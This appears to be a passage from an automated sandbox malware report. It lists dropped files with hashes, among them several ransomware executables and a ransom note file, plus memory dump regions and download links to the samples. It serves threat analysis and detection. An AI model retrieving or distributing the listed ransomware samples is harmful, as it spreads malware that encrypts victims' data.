                          8fc5f073dc9fa1e1ae47c60a5f06e0a48709fd6a4302dffaa721858409e7bde64bc6856d3fb28891090516d1a7afc542579de287778b5755eafe75cc67d45d93

                          Download Submit

                        • C:\Users\Admin\AppData\Local\Temp\6491.tmp\64A2.bat
                          Filesize

                          3KB

                          MD5

                          9275888ff69ac5ec63ab5d4d85378649

                          SHA1

                          1027e519f7cffe07d5a32b18c6a48e0677971bca

                          SHA256

                          56de06ca874d15d3dbf270ea7452c2a64c603589bf30406c1749e839fc14fe81

                          SHA512

                          de9e6cd5d0dd96bd685c427fcb9eb7346b173ee842a2c907c5eca7578747ddb17b00647582d230752874050ee08fcef37ba85717fba25a856270aa5865bce9cf

                          Download Submit

                        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4hpuofol.lde.ps1
                          Filesize

                          60B

                          MD5

                          d17fe0a3f47be24a6453e9ef58c94641

                          SHA1

                          6ab83620379fc69f80c0242105ddffd7d98d5d9d

                          SHA256

                          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                          SHA512

                          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                          Download Submit

                        • C:\Users\Admin\AppData\Local\Temp\aut6222.tmp
                          Filesize

                          830B

                          MD5

                          0eef69079adf48e3054047733b8bb8ad

                          SHA1

                          7efb70c86d1cb5b8c38c38b57ede1d6faf2c0dc6

                          SHA256

                          b5207a645836ac4a9d910f8db6a942a8ac6b71b876c1e1924d73205933b048c5

                          SHA512

                          37c4f96fcae947d335c348e24ddad96fd1f1a3096310701b75a546fac41ffaf7d9efa1cb69016cb0f603ca2caaa190ceb173fa227fbe7775c0bfe6a19dbb9ad4

                          Download Submit

                        • C:\Users\Admin\Desktop\00414\HEUR-Trojan-Ransom.MSIL.Encoder.vho-30b877a266dc809a469155ab42de7ad0e225e15777870b03a049ddb1123217d4.exe
                          Filesize

                          106KB

                          MD5

                          5022d9cf4a4195d6ff21c1cc3d827fa1

                          SHA1

                          2c8fccdff1e0f9b3114ddf35b5db168a07342db2

                          SHA256

                          30b877a266dc809a469155ab42de7ad0e225e15777870b03a049ddb1123217d4

                          SHA512

                          680607038a22e2959f7f3764a6a8ab56fc865e06a779af7a324a2d478dc7bd9c613c619ed22448064b2094dc79b925dd0fc59d277081a4055811e52cbd3ca396

                          Download Submit

                        • C:\Users\Admin\Desktop\00414\HEUR-Trojan-Ransom.Win32.Blocker.gen-248eabc9c97d8c4994c26c88cf1806ea9274eb187e3eb0bae7ae8035c7f3b189.exe
                          Filesize

                          706KB

                          MD5

                          54a4be7037ecdb031563998906a365cd

                          SHA1

                          e19e35a43087696fc4e7ac0dfeea4ea19fed8f28

                          SHA256

                          248eabc9c97d8c4994c26c88cf1806ea9274eb187e3eb0bae7ae8035c7f3b189

                          SHA512

                          515c6edb804b85cdaa610a275cfda7490884a42dc5c1585681d13d644c0e5b2ef363dff586e24e1a44410db85e49ee3e2c9737b865f1f9e84271dc5800dbd60d

                          Download Submit

                        • C:\Users\Admin\Desktop\00414\HEUR-Trojan-Ransom.Win32.Encoder.gen-a868deb14742d23911aba5e97f35ecd8ac35effbe24b1f5f5b631c9d17d1481c.exe
                          Filesize

                          2.5MB

                          MD5

                          60a6656a9282f0a87aeb151a509eda37

                          SHA1

                          67bec70270c252f9ac0836f66a2599f5a7c465a2

                          SHA256

                          a868deb14742d23911aba5e97f35ecd8ac35effbe24b1f5f5b631c9d17d1481c

                          SHA512

                          20909c51dc56f60637b09627e220e5a1941a0c61d9d4f5e7060e5c1a7555e93c2040e0d61bfb88bfdf4b817fa1a166c7d71c07603aa4a0413c8da1b3db1ba874

                          Download Submit

                        • C:\Users\Admin\Desktop\00414\HEUR-Trojan-Ransom.Win32.Generic-5e58a1576d022944a3f18102fe5ff04a8b4d56918003b53b914beece11e63868.exe
                          Filesize

                          279KB

                          MD5

                          4233dc042a9e68b1f27147d47350ba92

                          SHA1

                          0fe264e1db45807db51309cf0b3944bdbdd1d485

                          SHA256

                          5e58a1576d022944a3f18102fe5ff04a8b4d56918003b53b914beece11e63868

                          SHA512

                          c03e542aa427113cd88f9683fa07f446f51e248f3c5112c4b1f36ea20b08fae796c9f99566eb728f46462f0adb74170ddc7c096e265e31ff51dd25411849d957

                          Download Submit

                        • C:\Users\Admin\Desktop\00414\Trojan-Ransom.Win32.AutoIt.ziq-20dc1a7d2186d078e6ecbe888855155ac683827efd9e052f7f85243bfc4d8c37.exe
                          Filesize

                          2.7MB

                          MD5

                          b175c381c21ed8e3d7a12404705b691b

                          SHA1

                          d473d612c4455ae135b9b28a9e99c16d10d90c58

                          SHA256

                          20dc1a7d2186d078e6ecbe888855155ac683827efd9e052f7f85243bfc4d8c37

                          SHA512

                          7aaa71ceffafca907a1898b71b066735b9df7eacf1ae2593c261e9ded1924abc22cc4ebda8e5481bccc32bd8d8f46c43d9e92e36fcaf37dc28b6d09b4bfc328a

                          Download Submit

                        • C:\Users\Admin\Desktop\00414\Trojan-Ransom.Win32.Cryrar.hev-3f967d306e6de83d8dd19745c0d6d3f94433ac29d4ddf9ad87dd1d4110cd700f.exe
                          Filesize

                          88KB

                          MD5

                          eaf94c9a09fe87ea58f0996ae3233a91

                          SHA1

                          8307d6fc8b57b2f86bde7f43d709f3d5d970836a

                          SHA256

                          3f967d306e6de83d8dd19745c0d6d3f94433ac29d4ddf9ad87dd1d4110cd700f

                          SHA512

                          d4168e0115f72ed71c231ee30ce232a3b06312431b38a007d86627e5c876c0fce86ea8be70449b07297341037b6643b9977541ca944085d28c65f44e942323fd

                          Download Submit

                        • C:\Users\Admin\Desktop\00414\Trojan-Ransom.Win32.Foreign.ofow-2776ed9eb0edfbe497366e4af177893a8dad3044c8c0dd3e37c559b748c337ae.exe
                          Filesize

                          691KB

                          MD5

                          134728554409720296acbfd5cecef4ac

                          SHA1

                          cc67c4dae17b6aa23716e5f2855b54521e57e427

                          SHA256

                          2776ed9eb0edfbe497366e4af177893a8dad3044c8c0dd3e37c559b748c337ae

                          SHA512

                          d60ab95f4005c88095492ed4bcff518f6502366548826bc231640c9f3c75b611f3fb536c055b5daad15c35f3c52e4d8f7c5573c94d17b870e7d8f4d2d34bb5f2

                          Download Submit

                        • C:\Users\Admin\Desktop\00414\Trojan-Ransom.Win32.Hades.a-ea310cc4fd4e8669e014ff417286da5edf2d3bef20abfb0a4f4951afe260d33d.exe
                          Filesize

                          1.8MB

                          MD5

                          7d4550dd4c6996057147ecc996b14e9a

                          SHA1

                          d0d68281f8459b5558559fbbf8c6c8ab4ddfec8b

                          SHA256

                          ea310cc4fd4e8669e014ff417286da5edf2d3bef20abfb0a4f4951afe260d33d

                          SHA512

                          e0653ac9c92bd134ff43886b4a8a36016660294c134ff11c6cddefe50494923fdcf370c3d96d5538d2c7ef20d216b4d15b914d40002c982c69021ee8998f57df

                          Download Submit

                        • C:\Users\Admin\Desktop\HOW-TO-DECRYPT-gn9cj.txt
                          Filesize

                          3KB

                          MD5

                          0c6d0a67b942d06fe27f41c7c582cdfe

                          SHA1

                          7e674cf6375b138cabca2706583d4ced7a1aef27

                          SHA256

                          014ea5effc97085b7832512b9ad2a5c4487265eb67e8d7b0920ef2bc8768400c

                          SHA512

                          53ec4509bc58f53419a8923d808c7dfdecf57dc203c37265d061aebab73147720d1c419e79578065a42c3b2a63504370f90516c3f0afad5d6997952592d3a39c

                          Download Submit

                        • C:\Users\Admin\RDP6\ConnectionClient.exe
                          Filesize

                          1.4MB

                          MD5

                          921cfacfd1cf49e625ef64c0c50a39fe

                          SHA1

                          f1dfa590ee16fb61022dfab0d370b2d6e1ab6026

                          SHA256

                          3df92ad1bae6037e39a80a18dfd0aafe75f42911daab625bd1618c306c367d5d

                          SHA512

                          f95bd6a95bcd6443ee56a1c9b490b4df9129a7cfbff8c42365ee80d1b9fd32e6452f52ddcf75a8a844ecbbc8b52d550fd7d5a54c10a28729cf60754e35fd6737

                          Download Submit

                        • C:\Users\Admin\RDP6\Session.rdp
                          Filesize

                          970B

                          MD5

                          4092edebdecbd951d472a70ab773e2d3

                          SHA1

                          3726f7bae5b04996519dcb14b97c191408099a85

                          SHA256

                          3b79f0e2fa8a82f00a14f9f1dd9b9a495487bfed6bd1978235627b023bd9d629

                          SHA512

                          b8755f9e816305fc77fe9c0026981536ed60818e3b7e32ed315d1bdead9f887170f09c0f381168d3c2c626e2e842d0a3b86006e2c77e6f9f17de9af1dc6aeffe

                          Download Submit

                        • C:\Users\Admin\RDP6\Trojan-Ransom.Win32.AutoIt.ziq-20dc1a7d2186d078e6ecbe888855155ac683827efd9e052f7f85243bfc4d8c37.txt
                          Filesize

                          1KB

                          MD5

                          b949be5207c126c47f0e9568c425c0a9

                          SHA1

                          c9bf430ab09db0d711940211314d578d423dfaf2

                          SHA256

                          6a145074fa80b03722f364728f662ac7911aaceaddd12856678e239398a33eea

                          SHA512

                          917b6e651d816d5d64acc6bcc453a375e35c49fb8901182bbe76944870ee6b7ddb199b34b4b00fce5239bcf0eca6728b62fa17302f93f38aefed86b59b3087cf

                          Download Submit

                        • C:\Users\Admin\RDP6\TsCredentials.exe
                          Filesize

                          137KB

                          MD5

                          e45b9771404521d44d411b3ce9f6c8ac

                          SHA1

                          b6f13100ade2b42f0ae148b7b23987d0dbbebf5f

                          SHA256

                          165a4240ed4bff512c5a6e69bb77d2606c9fc0e6273db1acb4e7e643d364f814

                          SHA512

                          60bd27fc02bb0f82e19fce92d84d4037d8488aa0d18b448747da6c266cc8c3e56b07a83401da4b28ea9b4cac77b5ba15134f53fad73407a22aa7ba032aa1e798

                          Download Submit

                        • C:\Users\Admin\RDP6\bkgsc.bmp
                          Filesize

                          8KB

                          MD5

                          0a3767472082815dd5126983fd004f34

                          SHA1

                          c41dc8b199b4d2cc0dfa9e0eb612e0fc3eff9fec

                          SHA256

                          91ca63fe192bf1bac2cc5405b2b0494f417028dbb7429e02a0a465977eb355dd

                          SHA512

                          ea7deea4d980057fda994eb856fc537c1e7d8b918ba95db246a4d667f2a54b1468373fcdc818a7b753d6ebb0ac107acca24ea849a4c27f4065301a68cae081d1

                          Download Submit

                        • C:\Users\Admin\RDP6\bkgsc.bmp
                          Filesize

                          7KB

                          MD5

                          feb0692918248950d909d114b957d722

                          SHA1

                          6858973ee8e05a16aabae9065f10617d4147e826

                          SHA256

                          3c1fb9294d8e0c12d608d3d59a798d3b065a06c1f845fdbceafd22b31096c10a

                          SHA512

                          d9e7eb8746686b3864ec25b662e05747ed35c954650c6feb064417abfa93257eef1862235bd3d60c0f9098cdcb0f915025325b9fd1d853b32b5d23a187b851f7

                          Download Submit

                        • C:\Users\Admin\RDP6\bkgscblue.bmp
                          Filesize

                          8KB

                          MD5

                          be7e85a3d27a6489b6f0a8b3d552f41f

                          SHA1

                          62d938fac0779c9d722dce8b927aedd8268483af

                          SHA256

                          a6d8f953a1cc5c121a27ddedab7acdee19b95877f45f97e67617ac8a20eef161

                          SHA512

                          7f0b9b1fef129b870014434acd5fecd48cfc52b48b824419a257fe88254fa5fd60babe71aa98700830fd1bf06a0539dc2aca74ae14e4f9ab5cbe2d489aa6c046

                          Download Submit

                        • C:\Users\Admin\RDP6\bkgscpink.bmp
                          Filesize

                          8KB

                          MD5

                          664f744146c579405c94f2641276de27

                          SHA1

                          f2c1bb74de77b1713845f19d94b4a1a39214b37b

                          SHA256

                          707aa269153242c45da813a38a012f99363d74c68fd5df45457fc7a771350c9e

                          SHA512

                          855ffa5dd14dc7ee3262ca2f5e978515db6d0a0cdd0a87000c1def07236bec97787e846850163cda51fe1d5cd92cbb2331c1fd0bdd9ac23ae336f59a01f3c530

                          Download Submit

                        • C:\Users\Admin\RDP6\ico2.ico
                          Filesize

                          161KB

                          MD5

                          b523bebd004768f96ffeec26fe0c3a44

                          SHA1

                          4f060b59fbb8e91f8f347844ddd62138ab0d1a88

                          SHA256

                          f256ed6478e5644232411ac4ab0935ead22796581cf64c7e423fabd4d3fd8a7d

                          SHA512

                          8b51263e3440fe18a3e35a3ffb10eecee898c6ca8bab4ef32833912178ff02d6e92903107d55dbcf961c73a5576be9e2f04dc43cdda15f7a728f149ae66971d8

                          Download Submit

                        • memory/220-58-0x0000023BE0AC0000-0x0000023BE0ADE000-memory.dmp

                          Filesize

                          120KB

                          Download

                        • memory/220-55-0x0000023BE0A70000-0x0000023BE0AB4000-memory.dmp

                          Filesize

                          272KB

                          Download

                        • memory/220-56-0x0000023BE1C30000-0x0000023BE1CA6000-memory.dmp

                          Filesize

                          472KB

                          Download

                        • memory/220-45-0x0000023BE09F0000-0x0000023BE0A12000-memory.dmp

                          Filesize

                          136KB

                          Download

                        • memory/748-267-0x0000000000400000-0x00000000004B3000-memory.dmp

                          Filesize

                          716KB

                          Download

                        • memory/748-266-0x0000000002910000-0x000000000292B000-memory.dmp

                          Filesize

                          108KB

                          Download

                        • memory/748-256-0x0000000000400000-0x00000000004B3000-memory.dmp

                          Filesize

                          716KB

                          Download

                        • memory/852-318-0x0000000140000000-0x00000001401D8000-memory.dmp

                          Filesize

                          1.8MB

                          Download

                        • memory/852-661-0x0000000140000000-0x00000001401D8000-memory.dmp

                          Filesize

                          1.8MB

                          Download

                        • memory/852-678-0x0000000140000000-0x00000001401D8000-memory.dmp

                          Filesize

                          1.8MB

                          Download

                        • memory/1376-274-0x0000000000400000-0x00000000004B4000-memory.dmp

                          Filesize

                          720KB

                          Download

                        • memory/1376-270-0x0000000000400000-0x00000000004B4000-memory.dmp

                          Filesize

                          720KB

                          Download

                        • memory/2004-305-0x0000000140000000-0x00000001401D8000-memory.dmp

                          Filesize

                          1.8MB

                          Download

                        • memory/2004-298-0x0000000140000000-0x00000001401D8000-memory.dmp

                          Filesize

                          1.8MB

                          Download

                        • memory/2004-679-0x0000000140000000-0x00000001401D8000-memory.dmp

                          Filesize

                          1.8MB

                          Download

                        • memory/2304-81-0x0000000004EF0000-0x0000000004EFA000-memory.dmp

                          Filesize

                          40KB

                          Download

                        • memory/2304-74-0x00000000006B0000-0x00000000006D0000-memory.dmp

                          Filesize

                          128KB

                          Download

                        • memory/2392-290-0x000002A0CF740000-0x000002A0CF750000-memory.dmp

                          Filesize

                          64KB

                          Download

                        • memory/2392-284-0x000002A0CEF70000-0x000002A0CEF80000-memory.dmp

                          Filesize

                          64KB

                          Download

                        • memory/2528-250-0x0000000000400000-0x000000000042A000-memory.dmp

                          Filesize

                          168KB

                          Download

                        • memory/2636-80-0x0000000005820000-0x00000000058B2000-memory.dmp

                          Filesize

                          584KB

                          Download

                        • memory/2636-78-0x0000000005D30000-0x00000000062D4000-memory.dmp

                          Filesize

                          5.6MB

                          Download

                        • memory/2636-75-0x0000000000F10000-0x0000000000F5C000-memory.dmp

                          Filesize

                          304KB

                          Download

                        • memory/2636-144-0x00000000059B0000-0x00000000059BA000-memory.dmp

                          Filesize

                          40KB

                          Download

                        • memory/2760-307-0x0000000000400000-0x000000000042A000-memory.dmp

                          Filesize

                          168KB

                          Download

                        • memory/3716-272-0x0000000000950000-0x0000000000951000-memory.dmp

                          Filesize

                          4KB

                          Download

                        • memory/4176-30-0x00000298B6E10000-0x00000298B6E11000-memory.dmp

                          Filesize

                          4KB

                          Download

                        • memory/4176-38-0x00000298B6E10000-0x00000298B6E11000-memory.dmp

                          Filesize

                          4KB

                          Download

                        • memory/4176-39-0x00000298B6E10000-0x00000298B6E11000-memory.dmp

                          Filesize

                          4KB

                          Download

                        • memory/4176-37-0x00000298B6E10000-0x00000298B6E11000-memory.dmp

                          Filesize

                          4KB

                          Download

                        • memory/4176-40-0x00000298B6E10000-0x00000298B6E11000-memory.dmp

                          Filesize

                          4KB

                          Download

                        • memory/4176-29-0x00000298B6E10000-0x00000298B6E11000-memory.dmp

                          Filesize

                          4KB

                          Download

                        • memory/4176-31-0x00000298B6E10000-0x00000298B6E11000-memory.dmp

                          Filesize

                          4KB

                          Download

                        • memory/4176-41-0x00000298B6E10000-0x00000298B6E11000-memory.dmp

                          Filesize

                          4KB

                          Download

                        • memory/4176-36-0x00000298B6E10000-0x00000298B6E11000-memory.dmp

                          Filesize

                          4KB

                          Download

                        • memory/4404-260-0x0000000000400000-0x00000000004B4000-memory.dmp

                          Filesize

                          720KB

                          Download

                        • memory/4404-265-0x0000000000400000-0x00000000004B4000-memory.dmp

                          Filesize

                          720KB

                          Download

                        • memory/4676-248-0x0000000000400000-0x000000000042A000-memory.dmp

                          Filesize

                          168KB

                          Download

                        • memory/4840-17-0x000001F7243D0000-0x000001F7243D1000-memory.dmp

                          Filesize

                          4KB

                          Download

                        • memory/4840-22-0x000001F7243D0000-0x000001F7243D1000-memory.dmp

                          Filesize

                          4KB

                          Download

                        • memory/4840-23-0x000001F7243D0000-0x000001F7243D1000-memory.dmp

                          Filesize

                          4KB

                          Download

                        • memory/4840-24-0x000001F7243D0000-0x000001F7243D1000-memory.dmp

                          Filesize

                          4KB

                          Download

                        • memory/4840-25-0x000001F7243D0000-0x000001F7243D1000-memory.dmp

                          Filesize

                          4KB

                          Download

                        • memory/4840-26-0x000001F7243D0000-0x000001F7243D1000-memory.dmp

                          Filesize

                          4KB

                          Download

                        • memory/4840-27-0x000001F7243D0000-0x000001F7243D1000-memory.dmp

                          Filesize

                          4KB

                          Download

                        • memory/4840-28-0x000001F7243D0000-0x000001F7243D1000-memory.dmp

                          Filesize

                          4KB

                          Download

                        • memory/4840-16-0x000001F7243D0000-0x000001F7243D1000-memory.dmp

                          Filesize

                          4KB

                          Download

                        • memory/4840-18-0x000001F7243D0000-0x000001F7243D1000-memory.dmp

                          Filesize

                          4KB

                          Download